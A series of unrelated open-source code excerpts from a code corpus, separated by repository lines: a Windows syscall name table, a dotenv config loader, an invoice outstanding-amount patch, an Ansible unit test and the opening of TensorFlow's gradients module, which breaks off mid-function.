'NtUserDestroyAcceleratorTable', # 0x16f
'NtUserDestroyCursor', # 0x170
'NtUserDestroyInputContext', # 0x171
'NtUserDestroyMenu', # 0x172
'NtUserDestroyWindow', # 0x173
'NtUserDisableThreadIme', # 0x174
'NtUserDispatchMessage', # 0x175
'NtUserDoSoundConnect', # 0x176
'NtUserDoSoundDisconnect', # 0x177
'NtUserDragDetect', # 0x178
'NtUserDragObject', # 0x179
'NtUserDrawAnimatedRects', # 0x17a
'NtUserDrawCaption', # 0x17b
'NtUserDrawCaptionTemp', # 0x17c
'NtUserDrawIconEx', # 0x17d
'NtUserDrawMenuBarTemp', # 0x17e
'NtUserEmptyClipboard', # 0x17f
'NtUserEnableMenuItem', # 0x180
'NtUserEnableScrollBar', # 0x181
'NtUserEndDeferWindowPosEx', # 0x182
'NtUserEndMenu', # 0x183
'NtUserEndPaint', # 0x184
'NtUserEnumDisplayDevices', # 0x185
'NtUserEnumDisplayMonitors', # 0x186
'NtUserEnumDisplaySettings', # 0x187
'NtUserEvent', # 0x188
'NtUserExcludeUpdateRgn', # 0x189
'NtUserFillWindow', # 0x18a
'NtUserFindExistingCursorIcon', # 0x18b
'NtUserFindWindowEx', # 0x18c
'NtUserFlashWindowEx', # 0x18d
'NtUserFrostCrashedWindow', # 0x18e
'NtUserGetAltTabInfo', # 0x18f
'NtUserGetAncestor', # 0x190
'NtUserGetAppImeLevel', # 0x191
'NtUserGetAsyncKeyState', # 0x192
'NtUserGetAtomName', # 0x193
'NtUserGetCaretBlinkTime', # 0x194
'NtUserGetCaretPos', # 0x195
'NtUserGetClassInfoEx', # 0x196
'NtUserGetClassName', # 0x197
'NtUserGetClipboardData', # 0x198
'NtUserGetClipboardFormatName', # 0x199
'NtUserGetClipboardOwner', # 0x19a
'NtUserGetClipboardSequenceNumber', # 0x19b
'NtUserGetClipboardViewer', # 0x19c
'NtUserGetClipCursor', # 0x19d
'NtUserGetComboBoxInfo', # 0x19e
'NtUserGetControlBrush', # 0x19f
'NtUserGetControlColor', # 0x1a0
'NtUserGetCPD', # 0x1a1
'NtUserGetCursorFrameInfo', # 0x1a2
'NtUserGetCursorInfo', # 0x1a3
'NtUserGetDC', # 0x1a4
'NtUserGetDCEx', # 0x1a5
'NtUserGetDoubleClickTime', # 0x1a6
'NtUserGetForegroundWindow', # 0x1a7
'NtUserGetGuiResources', # 0x1a8
'NtUserGetGUIThreadInfo', # 0x1a9
'NtUserGetIconInfo', # 0x1aa
'NtUserGetIconSize', # 0x1ab
'NtUserGetImeHotKey', # 0x1ac
'NtUserGetImeInfoEx', # 0x1ad
'NtUserGetInputLocaleInfo', # 0x1ae
'NtUserGetInternalWindowPos', # 0x1af
'NtUserGetKeyboardLayoutList', # 0x1b0
'NtUserGetKeyboardLayoutName', # 0x1b1
'NtUserGetKeyboardState', # 0x1b2
'NtUserGetKeyNameText', # 0x1b3
'NtUserGetKeyState', # 0x1b4
'NtUserGetListBoxInfo', # 0x1b5
'NtUserGetMenuBarInfo', # 0x1b6
'NtUserGetMenuIndex', # 0x1b7
'NtUserGetMenuItemRect', # 0x1b8
'NtUserGetMessage', # 0x1b9
'NtUserGetMouseMovePointsEx', # 0x1ba
'NtUserGetObjectInformation', # 0x1bb
'NtUserGetOpenClipboardWindow', # 0x1bc
'NtUserGetPriorityClipboardFormat', # 0x1bd
'NtUserGetProcessWindowStation', # 0x1be
'NtUserGetRawInputBuffer', # 0x1bf
'NtUserGetRawInputData', # 0x1c0
'NtUserGetRawInputDeviceInfo', # 0x1c1
'NtUserGetRawInputDeviceList', # 0x1c2
'NtUserGetRegisteredRawInputDevices', # 0x1c3
'NtUserGetScrollBarInfo', # 0x1c4
'NtUserGetSystemMenu', # 0x1c5
'NtUserGetThreadDesktop', # 0x1c6
'NtUserGetThreadState', # 0x1c7
'NtUserGetTitleBarInfo', # 0x1c8
'NtUserGetTopLevelWindow', # 0x1c9
'NtUserGetUpdatedClipboardFormats', # 0x1ca
'NtUserGetUpdateRect', # 0x1cb
'NtUserGetUpdateRgn', # 0x1cc
'NtUserGetWindowCompositionInfo', # 0x1cd
'NtUserGetWindowCompositionAttribute', # 0x1ce
'NtUserGetWindowDC', # 0x1cf
'NtUserGetWindowDisplayAffinity', # 0x1d0
'NtUserGetWindowPlacement', # 0x1d1
'NtUserGetWOWClass', # 0x1d2
'NtUserGhostWindowFromHungWindow', # 0x1d3
'NtUserHardErrorControl', # 0x1d4
'NtUserHideCaret', # 0x1d5
'NtUserHiliteMenuItem', # 0x1d6
'NtUserHungWindowFromGhostWindow', # 0x1d7
'NtUserImpersonateDdeClientWindow', # 0x1d8
'NtUserInitialize', # 0x1d9
'NtUserInitializeClientPfnArrays', # 0x1da
'NtUserInitTask', # 0x1db
'NtUserInternalGetWindowText', # 0x1dc
'NtUserInternalGetWindowIcon', # 0x1dd
'NtUserInvalidateRect', # 0x1de
'NtUserInvalidateRgn', # 0x1df
'NtUserIsClipboardFormatAvailable', # 0x1e0
'NtUserIsTopLevelWindow', # 0x1e1
'NtUserKillTimer', # 0x1e2
'NtUserLoadKeyboardLayoutEx', # 0x1e3
'NtUserLockWindowStation', # 0x1e4
'NtUserLockWindowUpdate', # 0x1e5
'NtUserLockWorkStation', # 0x1e6
'NtUserLogicalToPhysicalPoint', # 0x1e7
'NtUserMapVirtualKeyEx', # 0x1e8
'NtUserMenuItemFromPoint', # 0x1e9
'NtUserMessageCall', # 0x1ea
'NtUserMinMaximize', # 0x1eb
'NtUserMNDragLeave', # 0x1ec
'NtUserMNDragOver', # 0x1ed
'NtUserModifyUserStartupInfoFlags', # 0x1ee
'NtUserMoveWindow', # 0x1ef
'NtUserNotifyIMEStatus', # 0x1f0
'NtUserNotifyProcessCreate', # 0x1f1
'NtUserNotifyWinEvent', # 0x1f2
'NtUserOpenClipboard', # 0x1f3
'NtUserOpenDesktop', # 0x1f4
'NtUserOpenInputDesktop', # 0x1f5
'NtUserOpenThreadDesktop', # 0x1f6
'NtUserOpenWindowStation', # 0x1f7
'NtUserPaintDesktop', # 0x1f8
'NtUserPaintMonitor', # 0x1f9
'NtUserPeekMessage', # 0x1fa
'NtUserPhysicalToLogicalPoint', # 0x1fb
'NtUserPostMessage', # 0x1fc
'NtUserPostThreadMessage', # 0x1fd
'NtUserPrintWindow', # 0x1fe
'NtUserProcessConnect', # 0x1ff
'NtUserQueryInformationThread', # 0x200
'NtUserQueryInputContext', # 0x201
'NtUserQuerySendMessage', # 0x202
'NtUserQueryWindow', # 0x203
'NtUserRealChildWindowFromPoint', # 0x204
'NtUserRealInternalGetMessage', # 0x205
'NtUserRealWaitMessageEx', # 0x206
'NtUserRedrawWindow', # 0x207
'NtUserRegisterClassExWOW', # 0x208
'NtUserRegisterErrorReportingDialog', # 0x209
'NtUserRegisterUserApiHook', # 0x20a
'NtUserRegisterHotKey', # 0x20b
'NtUserRegisterRawInputDevices', # 0x20c
'NtUserRegisterServicesProcess', # 0x20d
'NtUserRegisterTasklist', # 0x20e
'NtUserRegisterWindowMessage', # 0x20f
'NtUserRemoveClipboardFormatListener', # 0x210
'NtUserRemoveMenu', # 0x211
'NtUserRemoveProp', # 0x212
'NtUserResolveDesktopForWOW', # 0x213
'NtUserSBGetParms', # 0x214
'NtUserScrollDC', # 0x215
'NtUserScrollWindowEx', # 0x216
'NtUserSelectPalette', # 0x217
'NtUserSendInput', # 0x218
'NtUserSetActiveWindow', # 0x219
'NtUserSetAppImeLevel', # 0x21a
'NtUserSetCapture', # 0x21b
'NtUserSetChildWindowNoActivate', # 0x21c
'NtUserSetClassLong', # 0x21d
'NtUserSetClassWord', # 0x21e
'NtUserSetClipboardData', # 0x21f
'NtUserSetClipboardViewer', # 0x220
'NtUserSetCursor', # 0x221
'NtUserSetCursorContents', # 0x222
'NtUserSetCursorIconData', # 0x223
'NtUserSetFocus', # 0x224
'NtUserSetImeHotKey', # 0x225
'NtUserSetImeInfoEx', # 0x226
'NtUserSetImeOwnerWindow', # 0x227
'NtUserSetInformationThread', # 0x228
'NtUserSetInternalWindowPos', # 0x229
'NtUserSetKeyboardState', # 0x22a
'NtUserSetMenu', # 0x22b
'NtUserSetMenuContextHelpId', # 0x22c
'NtUserSetMenuDefaultItem', # 0x22d
'NtUserSetMenuFlagRtoL', # 0x22e
'NtUserSetObjectInformation', # 0x22f
'NtUserSetParent', # 0x230
'NtUserSetProcessWindowStation', # 0x231
'NtUserGetProp', # 0x232
'NtUserSetProp', # 0x233
'NtUserSetScrollInfo', # 0x234
'NtUserSetShellWindowEx', # 0x235
'NtUserSetSysColors', # 0x236
'NtUserSetSystemCursor', # 0x237
'NtUserSetSystemMenu', # 0x238
'NtUserSetSystemTimer', # 0x239
'NtUserSetThreadDesktop', # 0x23a
'NtUserSetThreadLayoutHandles', # 0x23b
'NtUserSetThreadState', # 0x23c
'NtUserSetTimer', # 0x23d
'NtUserSetProcessDPIAware', # 0x23e
'NtUserSetWindowCompositionAttribute', # 0x23f
'NtUserSetWindowDisplayAffinity', # 0x240
'NtUserSetWindowFNID', # 0x241
'NtUserSetWindowLong', # 0x242
'NtUserSetWindowPlacement', # 0x243
'NtUserSetWindowPos', # 0x244
'NtUserSetWindowRgn', # 0x245
'NtUserGetWindowRgnEx', # 0x246
'NtUserSetWindowRgnEx', # 0x247
'NtUserSetWindowsHookAW', # 0x248
'NtUserSetWindowsHookEx', # 0x249
'NtUserSetWindowStationUser', # 0x24a
'NtUserSetWindowWord', # 0x24b
'NtUserSetWinEventHook', # 0x24c
'NtUserShowCaret', # 0x24d
'NtUserShowScrollBar', # 0x24e
'NtUserShowWindow', # 0x24f
'NtUserShowWindowAsync', # 0x250
'NtUserSoundSentry', # 0x251
'NtUserSwitchDesktop', # 0x252
'NtUserSystemParametersInfo', # 0x253
'NtUserTestForInteractiveUser', # 0x254
'NtUserThunkedMenuInfo', # 0x255
'NtUserThunkedMenuItemInfo', # 0x256
'NtUserToUnicodeEx', # 0x257
'NtUserTrackMouseEvent', # 0x258
'NtUserTrackPopupMenuEx', # 0x259
'NtUserCalculatePopupWindowPosition', # 0x25a
'NtUserCalcMenuBar', # 0x25b
'NtUserPaintMenuBar', # 0x25c
'NtUserTranslateAccelerator', # 0x25d
'NtUserTranslateMessage', # 0x25e
'NtUserUnhookWindowsHookEx', # 0x25f
'NtUserUnhookWinEvent', # 0x260
'NtUserUnloadKeyboardLayout', # 0x261
'NtUserUnlockWindowStation', # 0x262
'NtUserUnregisterClass', # 0x263
'NtUserUnregisterUserApiHook', # 0x264
'NtUserUnregisterHotKey', # 0x265
'NtUserUpdateInputContext', # 0x266
'NtUserUpdateInstance', # 0x267
'NtUserUpdateLayeredWindow', # 0x268
'NtUserGetLayeredWindowAttributes', # 0x269
'NtUserSetLayeredWindowAttributes', # 0x26a
'NtUserUpdatePerUserSystemParameters', # 0x26b
'NtUserUserHandleGrantAccess', # 0x26c
'NtUserValidateHandleSecure', # 0x26d
'NtUserValidateRect', # 0x26e
'NtUserValidateTimerCallback', # 0x26f
'NtUserVkKeyScanEx', # 0x270
'NtUserWaitForInputIdle', # 0x271
'NtUserWaitForMsgAndEvent', # 0x272
'NtUserWaitMessage', # 0x273
'NtUserWindowFromPhysicalPoint', # 0x274
'NtUserWindowFromPoint', # 0x275
'NtUserYieldTask', # 0x276
'NtUserRemoteConnect', # 0x277
'NtUserRemoteRedrawRectangle', # 0x278
'NtUserRemoteRedrawScreen', # 0x279
'NtUserRemoteStopScreenUpdates', # 0x27a
'NtUserCtxDisplayIOCtl', # 0x27b
'NtUserRegisterSessionPort', # 0x27c
'NtUserUnregisterSessionPort', # 0x27d
'NtUserUpdateWindowTransform', # 0x27e
'NtUserDwmStartRedirection', # 0x27f
'NtUserDwmStopRedirection', # 0x280
'NtUserGetWindowMinimizeRect', # 0x281
'NtUserSfmDxBindSwapChain', # 0x282
'NtUserSfmDxOpenSwapChain', # 0x283
'NtUserSfmDxReleaseSwapChain', # 0x284
'NtUserSfmDxSetSwapChainBindingStatus', # 0x285
'NtUserSfmDxQuerySwapChainBindingStatus', # 0x286
'NtUserSfmDxReportPendingBindingsToDwm', # 0x287
'NtUserSfmDxGetSwapChainStats', # 0x288
'NtUserSfmDxSetSwapChainStats', # 0x289
'NtUserSfmGetLogicalSurfaceBinding', # 0x28a
'NtUserSfmDestroyLogicalSurfaceBinding', # 0x28b
'NtUserModifyWindowTouchCapability', # 0x28c
'NtUserIsTouchWindow', # 0x28d
'NtUserSendTouchInput', # 0x28e
'NtUserEndTouchOperation', # 0x28f
'NtUserGetTouchInputInfo', # 0x290
'NtUserChangeWindowMessageFilterEx', # 0x291
'NtUserInjectGesture', # 0x292
'NtUserGetGestureInfo', # 0x293
'NtUserGetGestureExtArgs', # 0x294
'NtUserManageGestureHandlerWindow', # 0x295
'NtUserSetGestureConfig', # 0x296
'NtUserGetGestureConfig', # 0x297
'NtGdiEngAssociateSurface', # 0x298
'NtGdiEngCreateBitmap', # 0x299
'NtGdiEngCreateDeviceSurface', # 0x29a
'NtGdiEngCreateDeviceBitmap', # 0x29b
'NtGdiEngCreatePalette', # 0x29c
'NtGdiEngComputeGlyphSet', # 0x29d
'NtGdiEngCopyBits', # 0x29e
'NtGdiEngDeletePalette', # 0x29f
'NtGdiEngDeleteSurface', # 0x2a0
'NtGdiEngEraseSurface', # 0x2a1
'NtGdiEngUnlockSurface', # 0x2a2
'NtGdiEngLockSurface', # 0x2a3
'NtGdiEngBitBlt', # 0x2a4
'NtGdiEngStretchBlt', # 0x2a5
'NtGdiEngPlgBlt', # 0x2a6
'NtGdiEngMarkBandingSurface', # 0x2a7
'NtGdiEngStrokePath', # 0x2a8
'NtGdiEngFillPath', # 0x2a9
'NtGdiEngStrokeAndFillPath', # 0x2aa
'NtGdiEngPaint', # 0x2ab
'NtGdiEngLineTo', # 0x2ac
'NtGdiEngAlphaBlend', # 0x2ad
'NtGdiEngGradientFill', # 0x2ae
'NtGdiEngTransparentBlt', # 0x2af
'NtGdiEngTextOut', # 0x2b0
'NtGdiEngStretchBltROP', # 0x2b1
'NtGdiXLATEOBJ_cGetPalette', # 0x2b2
'NtGdiXLATEOBJ_iXlate', # 0x2b3
'NtGdiXLATEOBJ_hGetColorTransform', # 0x2b4
'NtGdiCLIPOBJ_bEnum', # 0x2b5
'NtGdiCLIPOBJ_cEnumStart', # 0x2b6
'NtGdiCLIPOBJ_ppoGetPath', # 0x2b7
'NtGdiEngDeletePath', # 0x2b8
'NtGdiEngCreateClip', # 0x2b9
'NtGdiEngDeleteClip', # 0x2ba
'NtGdiBRUSHOBJ_ulGetBrushColor', # 0x2bb
'NtGdiBRUSHOBJ_pvAllocRbrush', # 0x2bc
'NtGdiBRUSHOBJ_pvGetRbrush', # 0x2bd
'NtGdiBRUSHOBJ_hGetColorTransform', # 0x2be
'NtGdiXFORMOBJ_bApplyXform', # 0x2bf
'NtGdiXFORMOBJ_iGetXform', # 0x2c0
'NtGdiFONTOBJ_vGetInfo', # 0x2c1
'NtGdiFONTOBJ_pxoGetXform', # 0x2c2
'NtGdiFONTOBJ_cGetGlyphs', # 0x2c3
'NtGdiFONTOBJ_pifi', # 0x2c4
'NtGdiFONTOBJ_pfdg', # 0x2c5
'NtGdiFONTOBJ_pQueryGlyphAttrs', # 0x2c6
'NtGdiFONTOBJ_pvTrueTypeFontFile', # 0x2c7
'NtGdiFONTOBJ_cGetAllGlyphHandles', # 0x2c8
'NtGdiSTROBJ_bEnum', # 0x2c9
'NtGdiSTROBJ_bEnumPositionsOnly', # 0x2ca
'NtGdiSTROBJ_bGetAdvanceWidths', # 0x2cb
'NtGdiSTROBJ_vEnumStart', # 0x2cc
'NtGdiSTROBJ_dwGetCodePage', # 0x2cd
'NtGdiPATHOBJ_vGetBounds', # 0x2ce
'NtGdiPATHOBJ_bEnum', # 0x2cf
'NtGdiPATHOBJ_vEnumStart', # 0x2d0
'NtGdiPATHOBJ_vEnumStartClipLines', # 0x2d1
'NtGdiPATHOBJ_bEnumClipLines', # 0x2d2
'NtGdiGetDhpdev', # 0x2d3
'NtGdiEngCheckAbort', # 0x2d4
'NtGdiHT_Get8BPPFormatPalette', # 0x2d5
'NtGdiHT_Get8BPPMaskPalette', # 0x2d6
'NtGdiUpdateTransform', # 0x2d7
'NtGdiSetPUMPDOBJ', # 0x2d8
'NtGdiBRUSHOBJ_DeleteRbrush', # 0x2d9
'NtGdiUMPDEngFreeUserMem', # 0x2da
'NtGdiDrawStream', # 0x2db
'NtGdiSfmGetNotificationTokens', # 0x2dc
'NtGdiHLSurfGetInformation', # 0x2dd
'NtGdiHLSurfSetInformation', # 0x2de
'NtGdiDdDDICreateAllocation', # 0x2df
'NtGdiDdDDIQueryResourceInfo', # 0x2e0
'NtGdiDdDDIOpenResource', # 0x2e1
'NtGdiDdDDIDestroyAllocation', # 0x2e2
'NtGdiDdDDISetAllocationPriority', # 0x2e3
'NtGdiDdDDIQueryAllocationResidency', # 0x2e4
'NtGdiDdDDICreateDevice', # 0x2e5
'NtGdiDdDDIDestroyDevice', # 0x2e6
'NtGdiDdDDICreateContext', # 0x2e7
'NtGdiDdDDIDestroyContext', # 0x2e8
'NtGdiDdDDICreateSynchronizationObject', # 0x2e9
'NtGdiDdDDIOpenSynchronizationObject', # 0x2ea
'NtGdiDdDDIDestroySynchronizationObject', # 0x2eb
'NtGdiDdDDIWaitForSynchronizationObject', # 0x2ec
'NtGdiDdDDISignalSynchronizationObject', # 0x2ed
'NtGdiDdDDIGetRuntimeData', # 0x2ee
'NtGdiDdDDIQueryAdapterInfo', # 0x2ef
'NtGdiDdDDILock', # 0x2f0
'NtGdiDdDDIUnlock', # 0x2f1
'NtGdiDdDDIGetDisplayModeList', # 0x2f2
'NtGdiDdDDISetDisplayMode', # 0x2f3
'NtGdiDdDDIGetMultisampleMethodList', # 0x2f4
'NtGdiDdDDIPresent', # 0x2f5
'NtGdiDdDDIRender', # 0x2f6
'NtGdiDdDDIOpenAdapterFromDeviceName', # 0x2f7
'NtGdiDdDDIOpenAdapterFromHdc', # 0x2f8
'NtGdiDdDDICloseAdapter', # 0x2f9
'NtGdiDdDDIGetSharedPrimaryHandle', # 0x2fa
'NtGdiDdDDIEscape', # 0x2fb
'NtGdiDdDDIQueryStatistics', # 0x2fc
'NtGdiDdDDISetVidPnSourceOwner', # 0x2fd
'NtGdiDdDDIGetPresentHistory', # 0x2fe
'NtGdiDdDDIGetPresentQueueEvent', # 0x2ff
'NtGdiDdDDICreateOverlay', # 0x300
'NtGdiDdDDIUpdateOverlay', # 0x301
'NtGdiDdDDIFlipOverlay', # 0x302
'NtGdiDdDDIDestroyOverlay', # 0x303
'NtGdiDdDDIWaitForVerticalBlankEvent', # 0x304
'NtGdiDdDDISetGammaRamp', # 0x305
'NtGdiDdDDIGetDeviceState', # 0x306
'NtGdiDdDDICreateDCFromMemory', # 0x307
'NtGdiDdDDIDestroyDCFromMemory', # 0x308
'NtGdiDdDDISetContextSchedulingPriority', # 0x309
'NtGdiDdDDIGetContextSchedulingPriority', # 0x30a
'NtGdiDdDDISetProcessSchedulingPriorityClass', # 0x30b
'NtGdiDdDDIGetProcessSchedulingPriorityClass', # 0x30c
'NtGdiDdDDIReleaseProcessVidPnSourceOwners', # 0x30d
'NtGdiDdDDIGetScanLine', # 0x30e
'NtGdiDdDDISetQueuedLimit', # 0x30f
'NtGdiDdDDIPollDisplayChildren', # 0x310
'NtGdiDdDDIInvalidateActiveVidPn', # 0x311
'NtGdiDdDDICheckOcclusion', # 0x312
'NtGdiDdDDIWaitForIdle', # 0x313
'NtGdiDdDDICheckMonitorPowerState', # 0x314
'NtGdiDdDDICheckExclusiveOwnership', # 0x315
'NtGdiDdDDISetDisplayPrivateDriverFormat', # 0x316
'NtGdiDdDDISharedPrimaryLockNotification', # 0x317
'NtGdiDdDDISharedPrimaryUnLockNotification', # 0x318
'NtGdiDdDDICreateKeyedMutex', # 0x319
'NtGdiDdDDIOpenKeyedMutex', # 0x31a
'NtGdiDdDDIDestroyKeyedMutex', # 0x31b
'NtGdiDdDDIAcquireKeyedMutex', # 0x31c
'NtGdiDdDDIReleaseKeyedMutex', # 0x31d
'NtGdiDdDDIConfigureSharedResource', # 0x31e
'NtGdiDdDDIGetOverlayState', # 0x31f
'NtGdiDdDDICheckVidPnExclusiveOwnership', # 0x320
'NtGdiDdDDICheckSharedResourceAccess', # 0x321
'DxgStubEnableDirectDrawRedirection', # 0x322
'DxgStubDeleteDirectDrawObject', # 0x323
'NtGdiGetNumberOfPhysicalMonitors', # 0x324
'NtGdiGetPhysicalMonitors', # 0x325
'NtGdiGetPhysicalMonitorDescription', # 0x326
'NtGdiDestroyPhysicalMonitor', # 0x327
'NtGdiDDCCIGetVCPFeature', # 0x328
'NtGdiDDCCISetVCPFeature', # 0x329
'NtGdiDDCCISaveCurrentSettings', # 0x32a
'NtGdiDDCCIGetCapabilitiesStringLength', # 0x32b
'NtGdiDDCCIGetCapabilitiesString', # 0x32c
'NtGdiDDCCIGetTimingReport', # 0x32d
'NtGdiDdCreateFullscreenSprite', # 0x32e
'NtGdiDdNotifyFullscreenSpriteUpdate', # 0x32f
'NtGdiDdDestroyFullscreenSprite', # 0x330
'NtGdiDdQueryVisRgnUniqueness', # 0x331
'NtUserSetMirrorRendering', # 0x332
'NtUserShowSystemCursor', # 0x333
'NtUserMagControl', # 0x334
'NtUserMagSetContextInformation', # 0x335
'NtUserMagGetContextInformation', # 0x336
'NtUserHwndQueryRedirectionInfo', # 0x337
'NtUserHwndSetRedirectionInfo', # 0x338
],
]
| gpl-2.0 |
planetlabs/datalake-common | datalake_common/conf.py | 2 | 2968 | # Copyright 2015 Planet Labs, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
from six import iteritems
from dotenv import load_dotenv
import os
from .errors import InsufficientConfiguration
def load_config(config_file, default_config_file, **kwargs):
    '''load configuration variables into the process environment

    Applications read configuration exclusively from environment variables.
    This function populates the environment from, in increasing precedence:

    1. a config file (an env-style file of lines like ``DATALAKE_FOO=bar``;
       by convention variables start with ``DATALAKE_`` or ``AWS_``),
    2. variables already present in the environment,
    3. the given kwargs.

    Kwargs are lowercase: a kwarg ``foo`` maps to ``DATALAKE_FOO``, except
    kwargs starting with ``aws_`` which map directly (``aws_baz`` ->
    ``AWS_BAZ``).

    Args:
        config_file: the configuration file to load. If None,
            default_config_file is consulted instead. If not None and the
            file does not exist, InsufficientConfiguration is raised.
        default_config_file: fallback file used when config_file is None.
            Silently ignored when it is None or does not exist.
        kwargs: key=value configuration pairs.
    '''
    if config_file and not os.path.exists(config_file):
        # An explicitly requested config file must exist.
        raise InsufficientConfiguration(
            'config file {} does not exist'.format(config_file))

    default_usable = default_config_file is not None and \
        os.path.exists(default_config_file)
    if config_file is None and default_usable:
        config_file = default_config_file

    if config_file is not None:
        load_dotenv(config_file)

    # kwargs win last, overriding anything the file or environment set.
    _update_environment(**kwargs)
def _update_environment(**kwargs):
    """Export every non-None kwarg as an environment variable.

    A key ``foo`` becomes ``DATALAKE_FOO``; a key already prefixed with
    ``aws_`` is merely uppercased (``aws_baz`` -> ``AWS_BAZ``).
    """
    for key, value in iteritems(kwargs):
        if value is None:
            continue
        name = key if key.startswith('aws_') else 'DATALAKE_' + key
        os.environ[name.upper()] = value
| apache-2.0 |
def execute():
	"""Patch: recompute outstanding_amount on submitted invoices.

	For each (Sales|Purchase) Invoice referenced as against_voucher in the
	general ledger, compare the ledger-implied outstanding (debit - credit)
	with the stored outstanding_amount and overwrite the stored value when
	they disagree and the sign matches the voucher type.
	"""
	import webnotes
	from webnotes.utils import flt
	records = webnotes.conn.sql("""
		select against_voucher_type, against_voucher,
		sum(ifnull(debit, 0)) - sum(ifnull(credit, 0)) as outstanding from `tabGL Entry`
		where ifnull(is_cancelled, 'No') = 'No'
		and against_voucher_type in ("Sales Invoice", "Purchase Invoice")
		and ifnull(against_voucher, '') != ''
		group by against_voucher_type, against_voucher""", as_dict=1)

	for r in records:
		# Stored value on the (submitted) invoice itself.
		outstanding = webnotes.conn.sql("""select name, outstanding_amount from `tab%s`
			where name = %s and docstatus = 1""" %
			(r["against_voucher_type"], '%s'), (r["against_voucher"]))

		if outstanding and abs(flt(r["outstanding"])) != flt(outstanding[0][1]):
			# Only fix when the ledger sign is consistent with the voucher
			# type: sales outstanding must be >= 0, purchase must be <= 0.
			# BUGFIX: the purchase branch previously read
			# flt(["outstanding"]) -- a list literal, which flt() coerces
			# to 0 (presumably; verify against webnotes.utils.flt), making
			# the purchase-invoice condition effectively always true.
			if ((r["against_voucher_type"]=='Sales Invoice' and flt(r["outstanding"]) >= 0) \
				or (r["against_voucher_type"]=="Purchase Invoice" and flt(r["outstanding"]) <= 0)):
				webnotes.conn.set_value(r["against_voucher_type"], r["against_voucher"],
					"outstanding_amount", abs(flt(r["outstanding"])))
agaffney/ansible | test/units/executor/module_common/test_modify_module.py | 84 | 1383 | # Copyright (c) 2018 Matt Martz <matt@sivel.net>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import pytest
from ansible.executor.module_common import modify_module
from ansible.module_utils.six import PY2
from test_module_common import templar
# Minimal stand-in for a pre-Ansiballz ("old-style") module: a bare Python
# script whose only job is to report which interpreter executed it.
FAKE_OLD_MODULE = b'''#!/usr/bin/python
import sys
print('{"result": "%s"}' % sys.executable)
'''
@pytest.fixture
def fake_old_module_open(mocker):
    """Patch the builtin open() so any read returns FAKE_OLD_MODULE."""
    target = '__builtin__.open' if PY2 else 'builtins.open'
    mocker.patch(target, mocker.mock_open(read_data=FAKE_OLD_MODULE))
# this test no longer makes sense, since a Python module will always either have interpreter discovery run or
# an explicit interpreter passed (so we'll never default to the module shebang)
# def test_shebang(fake_old_module_open, templar):
# (data, style, shebang) = modify_module('fake_module', 'fake_path', {}, templar)
# assert shebang == '#!/usr/bin/python'
def test_shebang_task_vars(fake_old_module_open, templar):
    """modify_module honours ansible_python_interpreter from task vars."""
    result = modify_module(
        'fake_module', 'fake_path', {}, templar,
        task_vars={'ansible_python_interpreter': '/usr/bin/python3'})
    (data, style, shebang) = result
    assert shebang == '#!/usr/bin/python3'
| gpl-3.0 |
MehdiSfr/tensor-flow | tensorflow/python/ops/gradients.py | 1 | 25465 | # Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Implements the graph generation for computation of gradients."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import warnings
import tensorflow.python.platform
import numpy as np
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
# pylint: disable=unused-import
from tensorflow.python.ops import array_grad
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import constant_op
from tensorflow.python.ops import control_flow_grad
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import image_grad
from tensorflow.python.ops import logging_ops
from tensorflow.python.ops import linalg_grad
from tensorflow.python.ops import math_grad
# pylint: enable=unused-import
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.platform import logging
# Warn the user if we convert a sparse representation to dense with at
# least this number of elements.  Used by _IndexedSlicesToTensor to decide
# whether the implicit densification is worth flagging.
_LARGE_SPARSE_NUM_ELEMENTS = 100000000
def _IndexedSlicesToTensor(value, dtype=None, name=None):
  """Converts an IndexedSlices object `value` to a Tensor.

  NOTE(mrry): This function is potentially expensive.

  Args:
    value: An ops.IndexedSlices object.
    dtype: The dtype of the Tensor to be returned.
    name: Optional name to use for the returned Tensor.

  Returns:
    A dense Tensor representing the values in the given IndexedSlices.

  Raises:
    ValueError: If the IndexedSlices does not have the same dtype.
  """
  if dtype and not dtype.is_compatible_with(value.dtype):
    raise ValueError(
        "Tensor conversion requested dtype %s for IndexedSlices with dtype %s" %
        (dtype.name, value.dtype.name))
  if value.dense_shape is None:
    # Without a dense_shape there is no way to know how big the dense
    # result should be, so the conversion cannot proceed.
    raise ValueError(
        "Tensor conversion requested for IndexedSlices without dense_shape: %s"
        % str(value))
  # TODO(mrry): Consider adding static shape information to
  # IndexedSlices, to avoid using numpy here.
  # When the dense shape is a graph-time constant we can estimate the
  # densified size and warn only above the threshold; otherwise warn
  # unconditionally since the result may be arbitrarily large.
  dense_shape_value = tensor_util.ConstantValue(value.dense_shape)
  if dense_shape_value is not None:
    num_elements = np.prod(dense_shape_value)
    if num_elements >= _LARGE_SPARSE_NUM_ELEMENTS:
      warnings.warn(
          "Converting sparse IndexedSlices to a dense Tensor with %d elements. "
          "This may consume a large amount of memory." % num_elements)
  else:
    warnings.warn(
        "Converting sparse IndexedSlices to a dense Tensor of unknown shape. "
        "This may consume a large amount of memory.")
  # Scatter-add the slice values into an implicit zero tensor whose first
  # dimension is dense_shape[0].
  return math_ops.unsorted_segment_sum(value.values,
                                       value.indices,
